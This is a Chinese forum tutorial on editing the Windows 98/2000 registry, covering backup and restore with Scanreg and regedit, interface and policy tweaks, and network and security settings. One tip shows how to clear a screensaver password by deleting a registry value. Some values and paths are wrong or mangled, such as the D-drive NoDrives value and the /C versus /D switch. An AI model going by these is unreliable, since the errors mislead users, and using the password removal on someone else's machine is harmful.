一、注册表基础
微软采用注册表来统一管理软硬件配置，从而大大提高了系统的稳定性和安全性，同时也使我们能更容易的对系统进行维护和管理。

（一）注册表基础ABC

　　总的来说注册表实际上是一个庞大的数据库，它包含了应用程序和系统软硬件的全部配置信息，初始化信息及其它重要数据。从一般用户的角度看，注册表系统由两部分组成:注册表数据库和注册表编辑器。其中注册表数据库包括两个文件:System.dat和User.dat。前者是用来保存计算机的系统信息，如安装的硬件和设备驱动程序的有关信息等;后者则是用来保存每个用户特有的信息，如桌面设置、墙纸或窗口的颜色设置等。它们一般都放在C盘Windows目录下。同时，微软为了防止注册表文件的损坏，特地准备了两个备份文件System.da0和User.da0(文件类型是.da)，也是放在C盘Windows目录下。
    在Windows 98中还有一个专门用来储备备份文件的文件夹，即C:\Windows\Bak，相比之下，注册表编辑器是用来对注册表进行各种编辑的工具。你可以在“开始”菜单中点击运行，在运行的对话框中填入“Regedit"即可看到注册表编辑器。
　　如果你在“系统配置实用程序"的启动项里发现ScanRegistry前的小勾没有被去掉的话，那么系统每天会自动调用Scanreg.exe对注册表备份一次，备份后的注册表被打成cab包，放在C:\Windows\sy**ckup目录下，文件名为rb00x.cab并且被加上隐藏属性的就是(一般有五个)。
　　下面让我们具体看看系统预定义的六个主关键字(即根键)吧:
　　(1)HKEY_CLASSES_ROOT:基层类别键，定义了系统中所有已经注册的文件扩展名、文件类型、文件图标等。
　　(2)HKEY_CURRENT_USER:定义了当前用户的所有权限，实际上就是HKEY_USERS\.Default下面的一部分内容，包含了当前用户的登录信息。
　　(3)HKEY_LOCAL_MACHINE:定义了本地计算机(相对网络环境而言)的软硬件的全部信息。当系统的配置和设置发生变化时，其下面的登录项也会随之改变。
　　(4)HKEY_USERS:定义了所有的用户信息，其中部分分支将映射到HKEY_CURRENT_USER关键字中，它的大部分设置都可以通过控制面板来修改。
　　(5)HKEY_CURRENT_CONFIG:定义了计算机的当前配置情况，如显示器、打印机等可选外部设备及其设置信息等。它实际上也是指向HKEY_LOCAL_MACHINE\Config结构中的某个分支的指针。
　　(6)HKEY－DYN－4DATA:定义了系统运行中的动态数据，即已发生的事件的有关信息。它不仅包含系统硬件的当前状态，也包含了那些需要更新和检索的数据。系统每次启动时都要创建此关键字。
　　另外，每个根键再由若干主键组成，键名代表一特定的注册项目，键值可分为字符串值、二进制值和DWORD值，都能用注册表编辑器进行修改。
　　Windows的注册表是控制系统启动、运行的最底层设置，其文件就是System.dat和User.dat，它们不仅至关重要，而且极其脆弱.

（二）修改注册表的基本方法

　　在注册表文本文件的首行必须用命令字符串 “REGEDIT”，其作用是通知系统调用regedit来完成注册信息的合并工作。 接下来的每一行或代表一个键值的声明或者为注释性的说明信息。
　　主键及其默认键值的声明格式为：
　　根键\一级主键\二级主键\......=默认键值
　　例如，欲在根键HKEY_CLASSES_ROOT的“＊”主键下添加一个“压缩”主键，以便通过上下文菜单直接压缩选定的文件，其主键的声明如下：
　　HKEY_CLASSES_ROOT\＊\shell\压缩 (＆U)\command = C:\dos\arj.exe a Temp＄％1 其中，“shell”和“command”都是固定的，不能更改和替换，“shell”指明将要为上下文菜单中添加命令， “command”指明具体的命令行信息。另外还要注意，在等号右边的键值字符串中， 如果要指明文件的路径，其中的“\”字符要使用“\\"代替，等号的前后还要添加一个起分隔作用的空格。
　　凡是用分号开头的行，均为说明信息行，用户可以利用说明行给文件中的命令给予必要的注解，使命令便于理解。
　　使用任何一个编辑器，编辑生成一个包含一系列主键声明行、说明行的列表，并将文件保存为以“.reg”为扩展名的文本文件，即创建了一个注册表文本文件。

二、注册表初级应用

Win 9x中注册表的重要性，众所周知。所以也是为了这个原因，Win 98特别新增加了个小工具——注册表检查器Scanreg.exe(Scanregw)。　　在每次开机启动Win 98时Scanreg自动运行，对系统注册表进行检查，并为每个开机日作一次备份，将System.dat、User.dat、System.ini、Win.ini四个文件打包成Cab文件，以rb00？.Cab命名，存放于系统备份文件夹Sy**ckup中，默认保存最近的5个备份文档。当检查到注册表出错时，它就用备份进行恢复。平时，若注册表有了问题或不合己意时，我们也可利用它来恢复。　　
　　
（一）用好“注册表检查程序”

     Scanreg的常用命令如下：
　　Scanreg /backup /restore /comment /fix
   参数包括：
　　/Backup：对注册表以及相关的系统配置文件进行备份。
　　/Restore：选择一个备件文件进行系统恢复。
　　/Fix：修复注册表
　　/Comment=“<评述>”：在做系统备份的时候，将特定的评语和标注文字加入到CAB包中。
　　/Autoscan：自动扫描注册表，并自动备份(如果已有当天的备份，则不带任何提示)
　　/Scanonly:扫描注册表，如果有错误则提示，不对注册表进行备份。
　　/opt：压缩注册表，在每回引导检查时如果有大于500KB的空间，则自动执行。这个命令在运行/Fix时它也将运行。
　　
1、手工启动“注册表检查程序”
　　在某些情况下(如用户已经人为禁止了“注册表检查程序”的自动运行功能之后)，我们仍需要手工启动“注册表检查程序”对系统进行检查，
　　“开始”-“运行”-“Scanregw”-“确定”，启动“注册表检查程序”,会自动对注册表数据库进行检查，如果正确，它就会询问用户是否重新备份注册表数据库，如果有问题，它将建议用户采用上次备份的信息进行恢复，确保Windows 98正常运行。
　　需要说明的是，“注册表检查程序”的检查、备份范围并不局限于注册表数据库，它同时还会处理Win.ini和System.ini等文件以确保Windows 98的安全运行。另外，“注册表检查程序”在备份文件时采用了压缩备份方式，它会将需要备份的文件统统压缩到一个CAB压缩包中，然后再以Rb???.cab为名保存到Windows 98的Sy**ackup子目录中(???为CAB压缩包文件的序号)，这样既节省了磁盘空间，又提高了备份文件的安全性。

2、DOS运行注册表检查程序
MS_DOS下的注册表检查器Scanreg.exe可以用来备份及恢复注册表。

（二）利用注册表维护与优化软件
　　
最好的注册表维护与优化工具当然是Norton Utilities提供的Windows Doctor和Norton Cleansweep提供的Registry Sweep。前者主攻诊断与修复，后者擅长减肥与优化。对于Windows Doctor，它的优点在于不但提供了对系统注册表错误设置的强大自检功能，而且还能全自动地修复。而Registry Sweep能非常彻底地为你的注册表减肥，将注册表中那些无用的系统垃圾完全清除。它们都相当智能，即使你对注册表的维护一无所知，只要一路“Next"下去，就能轻松完成对注册表的修复和优化，完完全全的“傻瓜"。

Nuts ＆ Bolts中的Registry Wizard也是非常称心的注册表维护的好工具，同样具有修复与减肥功能，清理注册表来又快又好。

当然，如果你不想选择集成式的系统维护工具，可以使用专门的注册表维护与优化软件。优化大师和超级兔仔注册表优化软件就很不错，不仅能够修复错误，而且能够清除非常多的注册表垃圾。

经典的注册表优化工具RegClean也是上选，凭着微软在操作系统领域中的霸主地位，它的注册表清理工具就值得你信赖

[ 本帖最后由 depressedboy 于 2007-3-19 14:19 编辑 ]

（三）手动注册表修改步步高

　　我们有时真希望电脑的界面和设置能发生一些变化，这样也能满足我们张扬的个性。修改注册表就不失为一个很好的方法，工具软件的原理绝大多数都是通过对注册表的操作而实现对系统的更改，只不过这些工作并不需要你去做，也没让你看到罢了。如果你真要成为电脑高手，怎能不学会对注册表的修改?

　　1、启动Windows时增加警告标题或问候信息
　　在 Hkey－Local－Machine\Software\Microsoft\Windows\CurrentVersion\Winlogon 下新建两个字符串值，一个是信息框的标题:“LegalNoticeCaption”，它的值不妨设为“请你注意!";另一个自然是信息框的内容了:“LegalNoticeText”=“上机没关系，可不要太久哦，你还有很多事没做呢!"。这样在你启动系统时，就会有一个信息框提醒你注意上机的时间和效率，不至于玩物丧志。当然，你完全可以输入其他的座右铭或问候语，来个极具个性化的“开场白"。

　　2、删除开始菜单中不需要的子项
　　有时当你出于某种原因不再需要开始菜单中的某个子项时，你可以修改注册表将其删除。在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下 添加相应的DWORD值，其中可以删除的子项有：收藏夹、文档、控制面板、查找、运行、注销、关闭系统及单击从这里开始的活动图标，相应的键为：“NoFavoritesMenu”、“NoRecentDocsMenu”、“NoSetFolders”、“NoFind”、“NoRun”、“NoLogoff”、“NoClose”及“NoStartBanner”，所有的键值均是“1”为关闭，“0”为激活（即原Windows默认状况)。HKEY_CURRENT_USER的设置是对应于所有用户的，若要针对当前登录用户，则在HKEY_USERS子树相应的目录下更改即可。

　　3、隐藏驱动器和禁用任务栏
　　在必要的时候你甚至可以隐藏某个驱动器以防止别人偷看你的个人隐私或机密文档。在 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下新建二进制串值 “NoDrives”。此键值与相应要隐藏的驱动器的关系有:“01 00 00 00”为隐藏A驱，“02 00 00 00”为B驱，“04 00 00 00”为C驱，“05 00 00 00”为D驱，隐藏全部的为“FF FF FF FF”。相同路径下DWORD值为“1”的“NoSetTaskbar"能让他人无法使用你的任务栏。

　　4、锁定桌面和禁止使用注册表编辑器
　　当你不希望别人修改你机器上的个人设置时，可直接把桌面锁起来，甚至对别人禁用注册表编辑器Regedit(但千万不要忘了为自己留条后路，储备第二个修改器吧)。在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer下加入DWORD值为“1”的“NoSaveSettings”和"NoChangeStartMenu"。此后系统对用户所作修改将不进行保存，也就是说用户对系统所作的一些修改都仅对当次运行有效，重启后就会自动恢复成修改前的状态。在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies下新建一主键“System"，就可用一个DWORD值为“1”的“DisableRegistryTools"禁止regedit的使用。

　　5、取消CD的自动播放功能，或禁止AUTORUN(自动运行)功能但保留CD的自动播放功能
　　将HKEY_LOCAL_MACHINE\Enum\SCSI\LITEON__CD－ROM_LTN403L__F(这是光驱信息，你的可能跟我不一样)\MF＆CHILD0000＆PCI＆VEN_1106＆DEV_0571＆SUBSYS_00000000＆REV_06＆BUS_00＆DEV_07＆FUNC_01主键下的二进制值“AutoInserNotification"的值设为 00.或将HKEY_CLASSES_ROOT\AudioCD\shell下主键“play"的内容删掉即可。
　　禁止Autorun(自动运行)功能，但保留CD的自动播放可在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer 下将串“NoDriveTypeAutoRun”的值改为 “bd 00 00 00”。

　　6、手动控制系统启动时自动加载的运行程序
　　在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion下Run的若干主键，它们就是系统启动时被加载的自动运行程序。相对应的Run－可以根据不同的情况灵活处理，自己控制自动运行的程序。
   需要提醒你的是，RunServies中的程序是在操作系统启动时就开始加载的，而Run下的程序是Windows初始化后才运行的，所以Runservies中的程序要先于Run中的程序运行，删除它们时一定要多加小心!

　　7、删除不完全删除的软件讯息
　　有时我们在直接删除某些文件夹或手动卸载软件时并没有完全将要删除的软件信息清除出系统，这时除了用反安装软件帮你打扫垃圾外，你也可以就用注册表编辑器在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall 下删去相应软件的主键。从此再也不怕垃圾污染了!

　　8、设置关联文件的多路打开
　　现以BMP文件为例，简述其设置方法，你完全可以举一反三，灵活运用。在HKEY_CLASSES_ROOT\＊ 下单击 ＊ 新建主键并命名为“Shell”，用右键单击“Shell”再新建一主键并输入自己喜欢的名字，这里以“打开方式"为例。接下来右键单击“打开方式”新建一主键命名为“Command”，编辑“默认”输入“Rundll32.exe Shell32.dll，OpenAs_RunDLL ％1”。以后有BMP文件时，用右键点击图标，则会在弹出的菜单中多出一项我们刚建成的“打开方式”，点击它你就会发现用处了。

三、注册表高级应用

工具软件可对注册表进行一系列的优化等操作。但碰到特殊的个案，就不灵了，还是需要我们手动进行。在对注册表操作之前，切记切记做好备份，否则极容易“一失足成千古恨”。

（一）修改注册表表现个性

　　改变一般图标大小(像素)：更改[HKEY－CURRENT－USER\Control Panel\desktop\WindowMetrics] ，令Shell Icon Size=″32″即可。

　  改变小图标大小(像素)：在[HKEY－CURRENT－USER\Control Panel\desktop\WindowMetrics]中，更改或新建Shell Small Icon Size=″16″即可。

　  禁止系统右键弹出菜单：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，建立键值NoViewContextMenu= 01 00 00 00。

　　禁止任务栏右键弹出菜单 ：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建NoTrayContextMenu=01 00 00 00。

　　隐藏[设置]菜单中[控制面板]和[打印机]菜单项：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建键值NoSetFolders=01 00 00 00。

　　隐藏[设置]菜单中[任务栏和开始菜单]菜单项：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建键值NoChangeStartMenu=01 00 00 00，NoSetTaskbar=01 00 00 00。
　　
    隐藏[设置]菜单中[文件夹选项...]：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建NoFolderOptions=01 00 00 00。

　　隐藏[设置]菜单中[活动桌面]项：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建NoSetActiveDesktop=01 00 00 00。

　　隐藏[设置]菜单中[Windows Update]项：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建NoWindowsUpdate=01 00 00 00。

　　禁止“文档”记录功能：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建NoRecentDocsHistory=01 00 00 00。

　　退出时自动清除文档内容：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建ClearRecentDocsOnExit= 01 00 00 00。

　　禁止数据光盘自动运行：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]中，新建NoDriveTypeAutoRun=00 00 00 00。

　　禁止CD光盘自动运行：在[HKEY－CLASSES－ROOT\AudioCD\shell]中，新建键值@=″ ″

　　去除新建快捷方式时自动添加的“快捷方式”字符串：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Explorer]中，令Link=00 00 00 00。或者
    HKEY－LOCAL－MACHINE\Software\Classes\lnkfile
　　HKEY－LOCAL－MACHINE\Software\Classes\piffile
　　以上两处的键值中都有一个 “IsShortCut”的字符串值，删除它，

　　 禁止使用MS－DOS方式：在[HKEY－CURRENT－USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]中，建立键值Disabled=01 00 00 00。

　　关闭“无反应的应用程序”的等待时间(毫秒)：在[HKEY－CURRENT－USER\Control Panel\desktop]中，新建WaitToKillAppTimeOut=″10000″

　　关闭出错应用程序的等待响应时间(毫秒)：在[HKEY－CURRENT－USER\Control Panel\desktop]中，新建HungAppTimeout=″10000″。

   给Windows 98启动框换个名 打开HKEY_LOCAL－MACHINE/SOFTWARE/Microsoft/Windows/Current Version，选中Version字串，双击将Windows 98换成你希望的名字，
  
  通过“我的电脑”直接启动资源管理器   　　打开HKEY_CLASS_ROOT/CLSID/{20D04FE0－3AEA－1069－A2D8－08002B30309D}/shell，右击shell，建立新主键“Open”，再在Open下建“Command”主键，键值改为“explorer /e c:\”(其缺省打开路径为“c:\”，要想改变，将“c:\”换为指定的路径名即可）。生效后双击“我的电脑”打开的就不再是“我的电脑”窗口，而是资源管理器了。

　　改变 Windows 98的安装路径  　　打开HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup在右边的窗口中找到“SourcePath”，然后将它改为你想要的即可。

   清除积累在运行”和“查找”对话框中的文件名  
　　打开HKEY_USERS/Default/Software/Microsoft/Windows/Current Version/Explorer/Runmru，在右窗口的“运行……”对话框删除；
打开 HKEY_USERS/Default/Software/Microsoft/Windows/CurrnetVersion/Explorer/DOC Find Spec MRU，在右窗口的“查找……”对话框删除。

  让“回收站”换名或从桌面上删除它   打开HKEY－CLASSES－ROOT/CLSID/{645FF040－5081－101B－9F08－00AA002F954E}将“默认”字符串的键值由“回收站”变为其它。
　　打开 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Desktop/Namespace/{645FF040－5081－101B－9F08－00AA002F954E}，右击右边窗口的“默认”字符串，并选“删除”，可删除“回收站”，如要恢复，进行其逆过程，在NameSpace主键下新建名为{645FF040－5081－101B－9F08－00AA002F954E}的主键即可。

   隐藏桌面的所有图标  　　HKEY－CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer，右窗口空白处新建/Dword为Nodesktop，将其键值改为1。恢复时只需将值改为0，或直接删除Nodesktop即可。如果更名为Nosavesettings，双击将其键值改为1，则会使桌面保持在第一次设置时的状态，即锁住桌面。如果更名为Noclose，双击将其键值改为1，则生效后开始菜单无“关闭系统”选项。恢复法同上。

   加速阶层式菜单的速度
　　打开HKEY－CURRENT－USER/ontrol Panel/desktop，单击编辑，选“新增”，选“串值”，命名为MenuShowDelay，双击它，在调整栏设数值1－10，1为最快

   启动Windows时自动登录用户名及口令  
　　打开 HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\Current Version\Winlogon，建一字符串“Default Password”，改其值为缺省用户口，
而缺省的用户名位置为：HKEY－LOCAL－MACHINE\etwork\Logon。

   改变“我的电脑”、“回收站”的图标  
　　 “HKEY－LOCAL－MACHINE\SOFTWARE\Classes\CLSID”选项,然后选择“编辑”\“查找”,键入“回收站”并确认。当找到该项后, 选择该项的DefaultIcon选项, 双击名称栏中的 “Full”(或“Deafult”、“Empty”),在弹出的对话框中显示的是“回收站”所对应的图标文件,更改该值为您喜欢的图标文件(注意要写全文件路径)。用同样的方法可以修改“我的电脑”的图标,只要在查找时键入“我的电脑”并确认即可。
　　
　　为文件夹菜单添加“快速清空回收站”   进入 “HKEY—CLASSES—ROOT\＊\shellex \ContextMenuHandlers”，在左栏中右击ContextMenuHandlers文件夹，然后“新建” \“主键”，将新文件夹的名称一字不差地改为：“{645FF040－5081－101B－9 F08－00AA002F954E}”，然后回车确认即可。

   删除运行窗口中多余的选项  在HKEY—USER\.Default\Software\Microsoft\Windows\CurrentVersion\Exploer\RunMRU的右窗口中保存着这些操作，删掉不需要的串值即可。

  把控制面板中的各个组件直接加到“运行”菜单中   用资源管理器在c: \Windows\Start Menu下建立一个名为 “控制面板.{21EC2020－3AEA－1069－A2DD－08002B30309d}”的文件夹(注意:空格、句点、大括号都要输入， 不能有错， 这里大括号中的数字是注册表中控制面板对应的类标识符，可在注册表编辑器的HKEY_CLASSES_ROOT\CLSID下面查出， 各机器的值可能会有所不同，应以查到的结果为准。

  删除桌面上的“系统级”图标  　　不能用一般的方法删除回收站、收件箱、网上邻居的图标时，先把HKEY—LOCAL—MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace下分支的关键字和右窗口的串值 (用纸笔)记下(供恢复时用)，然后删掉所不需要的分支。

   修改软件的所有权名称   将HKEY—LOCAL—MACHINE\SOFTWARE\Microsoft\Deveoper\Setup右窗口所有权键值修改一下
  
  改变窗口变化时的动画效果  HKEY—CURRENT—USER\Control Panel\Desktop\WindowsMetrics。在右边“新建”(New)\“串值”(String Value)，输入Minanimate后回车，为Minanimate的键值改为0。

  为一台机器设置两个IP地址  HKEY—LOCAL—MACHINE\System\CurrentControlSet\Services\Class\NetTrans，0000、0001 、0002……的目录，它们用于记录协议的安装情况。找到DriverDesc为“TCP/IP”的目录，修改IPAddress和IPMask两个键。 其中IPAddress为用逗号隔开的多个IP地址， IPMask是对应的掩码。例如设置IPAddress为“202.10.1.10，202.10.1.25”，IPMask为“255.255.255.0，255.255.255.0”时，表示为系统设置了两个IP地址202.10.1.10和202.10.1.25。  

  时间也能个性化
打开HKEY_CURRENT_USER\ControlPanel\International主键，在右边窗口的空白处新建名为“sTimeFormat”的字符串。将其键值修改为“hh点mm分”。

让心爱的壁纸永驻桌面
HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies子键，新建一个名为“ActiveDesktop”的子键，在其下新建一个双字节值（也就是WORD值），命名为“NoChangingWallPaper”，将数值设为“1”。

防止他人更改用户的桌面设置
打开HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Policies\Explorer中的“NoSaveSettings”（如没有此键，用户可自行添加），并将其键值从0改为1，就可以把桌面设置全部锁定了。

查看缩略图
Win 2K的用户可以在资源管理器中直接查看图片文件的缩略图，而Win 98的用户就不可能直接查看了，不过通过下面的修改就可以了。
打开HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon,双击右窗格中的“默认”，将键值参数末尾的“1”改为“%1”,重启就可以了。

找回失去的提示信息
在Windows中当你把鼠标停留在“我的电脑”等图标上时，会出现一行提示信息，如果提示没有了，该怎么办？
打开HKEY_CURRENT_USER\Software\Microsoft\WindowsCurrentVersion\Explorer\Advanced子键，在右侧的窗口中，双击“showInfoTip”，在弹出的对话框中将其值设为1，提示又回来了吧。

终止被锁死的程序
当我们在关机、重启计算机时，有时会弹出错误对话框，提醒用户“某个程序还在运行，请先关闭所有程序，然后退出Windows”，这说明由于某个程序处于锁死状态致使用户无法退出系统，通常的方法是用三个热键，然后点击结束任务来强行关闭锁死的程序，我们可以通过修改注册表终止锁死的程序，让系统安全关闭打开HKEY_CURRENT_USER\Controlpanel\desktop,双击右窗口中的“AutoEndTasks”项，将其值改为1，如果没有该项，可以新建再改之即可。

删除多余的.dll文件
打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\SharedDlls子键，在右边的窗口中，每个值项的数据都说明了该值项的.dll文件有几个程序共享，如果数据为0，则可知道该文件没有程序共享，可以删掉了。

删除多余的配色方案
打开HKEY_CURRENT_USER\Control Panel\Appearance\Schemes子键，在右侧的窗口中显示了系统自带的各种配色方案，选择某个方案，然后把它删除。删除时注意保留“默认”项。

（二）注册表实战之网络与安全设置

1.网络设置

设置登录时恢复连接
在Windows中可以把远程的共享目录映射成本地的一个驱动器，给局域网用户的日常操作带来方便。如果要经常使用网络资源，可以设置计算机下次登录时自动恢复连接。
打开HKEY_LOCAL_MACHINE\SYSTEM\Current ControlSet\Control\NetworkProvider子键，新建一个双字节值，命名为Restore Connection。将数值设为1即可。

加快上网速度
打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\MSTCP子键，右侧窗口中的DefaultTTL，将数值设为128。然后再打开HKEY_LOCAL_MACHINE\System\ CurrentControlSet\Services\Class\NetTrans子键，将MaxMTU和MaxMSS项的数值分别设为576和536。

设置自动拨号功能
打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVesion\Internet Settings子键，双击右侧窗口中的NoNetAutodial,将数值设为01　00　00　00。

2.安全设置

设置Win 98开机密码
Win 98在启动时和注销后，会要求用户输入用户名和密码，但是点“取消”就可以进入，并不能阻止非授权用户的使用。只要调整几个设置，就可以防止非法用户的使用。
（1）需要将登录方式改为“Microsoft友好登录”。打开控制面板，双击网络图标，在“基本网络登录方式”下的下拉列表中选中“Microsoft友好登录”，然后点“确定”，这样就把它设置成基本的登录方式。如果没有找到，说明没有安装，那么需要添加它。
（2）接下来建立用户。在控制面板中，双击“用户”图标。点“新建”按钮，给每个可以使用此机器的用户建立一个用户名，可以立刻就输入密码，也可以留到用户登录后自己修改密码。
（3）打开HKEY_LOCAL_MACHINE\Network\ Logon，在右边新建一个DWORD值，改名为“MustBeValidated”，双击它，将值改为1，就行了，重启看看用“取消”能不能进入系统。

设置密码的安全要求
Windows系统在缺省配置下允许任何字符或字符串作为密码，包括空格，这是相当不安全的，下面我们通过修改注册表使得用户设定的密码中必须同时包含字母和数字，从而增强系统的安全性。

打开HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion\Policies,新建Network子键，在右侧窗口中新建一个名为AlphanumPwds的双字节值，数值为1即可。

清除特洛伊木马程序BO
BO的文件是一个图标为全透明的文件，它将自己复制入硬盘后把自己重命名为“空格.EXE”。
打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run子键，如果该键下的默认为.exe，说明你已经中了BO木马，删除该键。然后重启计算机，删除windows\system下的空格.exe和windll.dll即可。清除其它的木马程序与此类似，不再详述。

开机自动运行屏保
打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run子键，新建一个名为“密码确认”的字符串项，在数值一栏中输入屏保程序的路径和名称即可。

解除屏保密码
打开HKEY_USERS\.Default\Control Panel\ desktop，找到右侧窗口中的ScreenSave_Data，将该键删除。这样屏保的密码就轻松地解除了。

（三）注册表的灵活备份和快速恢复

   由于Windows在运行时注册表是处于打开的状态，所以我们不能对它进行写入的操作，即不能对注册表进行恢复和修复操作。在实际使用中，可以对注册表的维护采用了一种更为灵活与快速的方法。　　

灵活备份
　　1．取消了注册表检查器的自启动特权，而让它随叫随到，完全听命于我，该出手时才出手。这样做也另有好处，即加快了Win 98的启动速度。
　　2．安装调试完Win 98和常用应用程序并优化注册表后，运行Scanregw程序，作一个备份文档rb000.cab。这一备份作为最基本的文档资料，一般不动。
　　3．以后系统每有更动，运行正常确认无误后，即再作一个备份。此次为活动备份，但仅保留1个，即后面的始终替换前面的，为rb001或rb002。
　　这样，就始终保留2个备份，既节省了一定的磁盘空间，又能合我们的意愿，还缩短了Win 98的启动时间。且恢复时，就在rb000和rb001（或rb002）之间酌情选择，简单明了，省时省力。

快速恢复
　　当注册表遭到损坏或不合我们的意愿而必须作恢复时，在纯DOS方式下，键入scanreg/restore，然后依照提示去做。这法子确实省事，可以这样做：
　　进入纯DOS方式(“关闭系统”→“重新启动计算机并切换至MS－DOS方式”)，在C:\WINDOWS下键入：
　　attrib －s －h －r ＊.dat
　　extract/e/y sy**ckup\rb00x.cab ＊.dat
　　若system.ini与win.ini也要恢复，则将＊.dat改成＊.＊，即：
　　attrib －s －h －r ＊.＊
　　extract/e/y sy**ckup\rb00x.cab ＊.＊
　　(其中rb00x中x为未知数，操作时应具体为备份文件名）
　　完后键入exit或按Ctrl＋Alt＋Del重新启动Win 98。


（四）注册表恢复手法大公开

　　1、Scanreg
　　如果你的系统是Windows 98，那么你可以用它提供的Scanreg.exe进行系统的备份与恢复，其最大优点是简单快速。其默认目录是C:\Windows\command.

　　2、dos下导出导入法
　　运行“Regedit"打开注册表编辑器，点击“注册表"的菜单，选中“导出注册表文件"，在打开的对话框中输入文件名，保存后即可。当你需要恢复你的注册表时，从备份的路径中“导入注册表文件"就搞定了。

   导出注册表文件  命令格式：
Regedit /L:system /R:user /E filename.reg Regpath
参数详解：
/L:system指定system.dat文件所在的路径。
/R:user指定user.dat文件所在的路径。
/E:此参数指定注册表编辑器要进行导出注册表操作，在此参数后面空一格，输入导出注册表的文件名。
Regpath指定要导出哪个注册表的分支，如果不指定，则将导出全部注册表分支。
注意事项：
/L:system和/R:user参数为可选项，如果缺省，那么注册表编辑器认为是对Windows目录下的system.dat和User.dat进行操作。但是如果你从软盘开始启动，那么必须使用/L和/R参数来指定System.dat和User.dat文件的具体路径，否则注册表编辑器将无法找到它们。

   导入注册表文件  命令格式：
Regedit /L:system /R:user file.reg
参数详解：
/L:system指定system.dat文件所在的路径。
/R:user指定user.dat文件所在的路径。
注意事项：
导入注册表和导出注册表在参数上有所不同，它仅仅需要指定被导入的.reg文件的路径即可，而不需要像“/E”、“/C”这样的参数。
   
   3、 dos下重建注册表  命令格式：
Regedit /L:system /R:user /C file.reg
参数详解：
/L:system指定system.dat文件所在的路径。
/R:user指定user.dat文件所在的路径。
/C:此参数将告诉注册表编辑器，用所指定的.reg文件中的内容重新建立注册表。
注意事项：
参数/C是个危险选项，它将会导入指定注册表文件的全部内容，从头到尾开始创建一个新的注册表。

   4.dos下删除注册表分支
此命令可以将注册表中的一个子键分支删除。
命令格式：
Regedit /L:system /R:user /D REGPATH
参数详解：
/L:system指定system.dat文件所在的路径。
/R:user指定user.dat文件所在的路径。
/C:此参数告诉注册表编辑器，将REGPATH所指定的注册表子键分支删除。
注意事项：
参数/C将删除指定子键下所包含的所有内容，包括所有子键、键值项和键值。

  5、DOS下修复注册表文件(见初级应用)  命令格式：

  6、覆盖还原法     具体来说，又可分为两种。
    第一种，利用两个DAT文件恢复。若你已经不能进入Win 98系统时，可以用DOS或Win 98启动盘引导，或者干脆从“DOS Prompt"启动，进入C:\Windows目录下，修改System.dat和User.dat这两个文件的属性后将其删除，再把两个备份文件.da0覆盖到相应的.dat文件上即可(留一个User.dat没覆盖)。若你对DOS下的Xcopy命令熟悉，用它也行。当然，如果你还能进入系统，那么直接在Windows下操作不是更容易吗?修改属性，删除源文件，为备份文件改名。
　　第二种，即提取Sy**ackup中的Rb00x.cab文件。由于Sy**ackup是隐含目录，如果你进不了系统，同样需要用Attrib命令去除隐藏属性。当你用Win 98启动盘开机进入DOS后，可利用启动盘中自带的Extract.exe命令将C:\Windows\sy**ackup\下的rb00x.cab解压到C:\Windows\，把源文件覆盖以完成对注册表的恢复。你该注意的是rb00x.cab文件一般有5个，尽量选择日期最接近稳定时期的那一个。举一个例子如:A:\>extract/e/l dir C:\Windows C:\Windows\sy**ackup\rb004.cab ＊.＊.当然，你也有可能不是用启动盘启动的，那么到C:\Windows\Command\下去找Extract命令吧，同样轻松搞定。至于在Win 98下解压rb00x.cab压缩包，那就更简单了，直接找到你想还原的那个rb00x.cab文件，双击打开，将四个文件(还有两个系统配置文件)分别解压到C:\Windows\下即可。

四、Windows 2000的注册表技巧

（一）备份Win 2000注册表

1、用备份工具
Win 2000的备份程序NTBackup.exe）是一个兼容性很强的工具，备份过程简单明了，可作为常规备份工具并可随时进行备份。在备份功能启动时，选中备份树中的系统状态，备份工具将保存注册表文件、启动系统文件、COM+类数据库、服务器公共共享目录等。备份后的文件以.bkf为扩展名，将备份文件置于不经常访问、比较安全的盘。恢复时，可直接执行.bkf文件，向导会提示如何完成整个还原过程。

2、用注册表编辑器
